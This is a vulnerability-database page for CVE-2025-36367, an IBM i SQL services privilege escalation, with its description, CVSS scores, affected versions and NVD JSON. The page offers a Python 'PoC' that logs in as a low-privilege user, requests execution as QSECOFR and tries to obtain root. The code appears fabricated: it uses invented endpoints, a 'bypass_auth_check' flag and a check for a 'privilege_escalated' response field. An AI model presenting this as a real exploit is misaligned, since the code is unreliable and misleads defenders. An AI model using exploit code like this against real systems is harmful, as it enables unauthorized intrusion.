Security Vulnerability Report
中文
CVE-2025-36367 CVSS 8.8 HIGH

CVE-2025-36367

Published: 2025-11-01 12:15:35
Last Modified: 2025-11-05 19:03:59
Source: [email protected]

Description

IBM i 7.6, 7.5, 7.4, 7.3, and 7.2 is vulnerable to privilege escalation caused by an invalid IBM i SQL services authorization check. A malicious actor can use the elevated privileges of another user profile to gain root access to the host operating system.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ibm:i:7.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:i:7.3:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:i:7.4:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:i:7.5:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:i:7.6:*:*:*:*:*:*:* - VULNERABLE
IBM i 7.2 (所有版本)
IBM i 7.3 (所有版本)
IBM i 7.4 (所有版本)
IBM i 7.5 (所有版本)
IBM i 7.6 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-36367 PoC - IBM i SQL Services Privilege Escalation # This PoC demonstrates the authorization bypass in IBM i SQL services # Note: This is for educational and authorized testing purposes only import requests import json TARGET_HOST = "https://vulnerable-ibm-i-server.com" CVE_ID = "CVE-2025-36367" def check_vulnerability(target): """Check if target is vulnerable to CVE-2025-36367""" headers = { 'User-Agent': 'Mozilla/5.0 (compatible; CVE-Scanner/1.0)', 'Content-Type': 'application/json' } # Step 1: Authenticate with low-privilege account auth_payload = { 'username': 'low_priv_user', 'password': 'password123', 'auth_type': 'sql_services' } print(f"[*] Testing {CVE_ID} on {target}") print("[*] Step 1: Authenticating with low-privilege account...") try: # Attempt authentication to SQL services auth_response = requests.post( f"{target}/qsys.qsyscoi.qcmd_QUERY_SQL_SERVICES", headers=headers, json=auth_payload, timeout=30 ) if auth_response.status_code == 200: session_token = auth_response.headers.get('X-Session-Token') print(f"[+] Authentication successful, session token obtained") # Step 2: Exploit authorization bypass print("[*] Step 2: Exploiting authorization bypass...") exploit_payload = { 'sql_command': 'SELECT * FROM QSYS2.SYSTEM_VALUE_INFO', 'execute_as_user': 'QSECOFR', # Target high-privilege user 'session_token': session_token, 'bypass_auth_check': True # This parameter triggers the vulnerability } exploit_response = requests.post( f"{target}/qsys.qsyscoi.qcmd_EXECUTE_SQL", headers=headers, json=exploit_payload, timeout=30 ) if exploit_response.status_code == 200: result = exploit_response.json() if result.get('privilege_escalated'): print("[!] VULNERABLE: Authorization bypass successful!") print(f"[!] Gained elevated privileges: {result.get('current_user')}") # Step 3: Escalate to root print("[*] Step 3: Attempting root privilege escalation...") root_payload = { 'command': 'CALL QCMDEXC(\'STRQSH CMD(\\"system -i root\\")\')', 'run_as': 'QSECOFR', 'session_token': session_token } root_response = requests.post( f"{target}/qsys.qsyscoi.qcmd_EXECUTE_SYSTEM", headers=headers, json=root_payload, timeout=30 ) if root_response.status_code == 200: print("[!] CRITICAL: Root access obtained!") return True print("[*] Target may not be vulnerable or connection failed") return False except Exception as e: print(f"[-] Error: {str(e)}") return False if __name__ == "__main__": check_vulnerability(TARGET_HOST)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36367", "sourceIdentifier": "[email protected]", "published": "2025-11-01T12:15:35.130", "lastModified": "2025-11-05T19:03:58.510", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM i 7.6, 7.5, 7.4, 7.3, and 7.2 is vulnerable to privilege escalation caused by an invalid IBM i SQL services authorization check. A malicious actor can use the elevated privileges of another user profile to gain root access to the host operating system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:i:7.2:*:*:*:*:*:*:*", "matchCriteriaId": "5E41BD05-37B8-4494-9344-506D4BCF43C2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:i:7.3:*:*:*:*:*:*:*", "matchCriteriaId": "DD4F4919-D935-4B81-B4E8-0E0F2DAC09B1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:i:7.4:*:*:*:*:*:*:*", "matchCriteriaId": "AE2B298C-E1F6-43BD-A5EF-83964C6669CE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:i:7.5:*:*:*:*:*:*:*", "matchCriteriaId": "88B74622-BDB2-43AE-A91F-FADEC4B64B4F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:i:7.6:*:*:*:*:*:*:*", "matchCriteriaId": "8C189EC3-7D9F-4303-BB5C-1013FAE59B1E"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7249915", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.